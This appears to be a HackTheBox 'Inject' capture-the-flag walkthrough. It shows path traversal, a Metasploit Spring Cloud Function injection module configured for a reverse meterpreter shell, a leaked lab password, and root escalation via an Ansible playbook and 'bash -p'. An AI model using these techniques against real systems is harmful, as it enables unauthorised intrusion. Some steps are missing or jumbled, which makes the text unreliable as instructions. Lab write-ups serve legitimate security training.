Inject HackTheBox Walkthrough
Inject is a Linux system and is regarded as a simple box to hack. On this box, we'll start with a fundamental port scan and work our way laterally from there. After that, we will use the file upload function to get a username and password after enumeration and look for any vulnerabilities that may exist in a specific version. We will use a password disclosure vulnerability laterally to collect plain credentials. The next task will be to get local user access so that we can access root and find playbook vulnerabilities.
Table of content
The Beginning
- Initial Nmap Port Scan
- Web Page Enumeration
- Directory enumeration
- Uploads image and Enumeration
- Spring cloud function Injection
- User Shell
- User Flag
Privilege Escalation
- Finding Privilege Escalation Vectors
- Playbook Vulnerability
- Root Flag
The Beginning
We'll begin the evaluation with the standard TCP/IP port scanning.
Initial Nmap Port Scan
Using nmap, we first do a port scan to identify the target host's open ports and active services. Kali Linux includes Nmap, a well-known port scanning programme. We've used the flags -sV and -an sC to run a service version of the target machine's default NSE scripts during the port scan.
Flags features:
-sV: Attempts to determine the service version
-sC: Scans with default NSE scripts
nmap -sV -sC 10.10.11.204
Web Page Enumeration
We enumerate port 8080 and access it over the browser showing an could service provider website which comes with eCommerce features. Nothing looks interesting here on the web page, so we decided to go with the directory enumeration
Directory Enumeration
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack against a web server and analyzing the response.
we are going to open the upload file after the enumeration
We intercepted the HTTP request for the POST method, which includes a png file format
Change the request to GET and change directory as
/show-image?img=../
/show-image?img=../../../../../../..
After multiple try we setings.xml file
After the Enumeration using metasploit
use exploit/multi/http/spring_cloud_function_spel_injection
set lhost 10.10.14.31
set rhost 10.10.11.204
Here we will get meterpreter shell using this we can access local user
We Don't have access for user.txt file after try multiple times in setings.xml file as user name password
username phil
password :DocPhillovestoInject123
Finding Privilege Escalation Vectors:
after geting user.txt we are able to see linpeas.sh it will helpful for enumeration
after completed running this script we are found something interesting
Playbook Vulnerability:
In google search as playbook vulnerability
create file as playbook_2.yml file and download
python -m SimpleHTTPServer 80
After download run the follwing commands
Root Flag:
ls /bin/bash
/bin/bash
ls /bin/bash
bash -p
What's Your Reaction?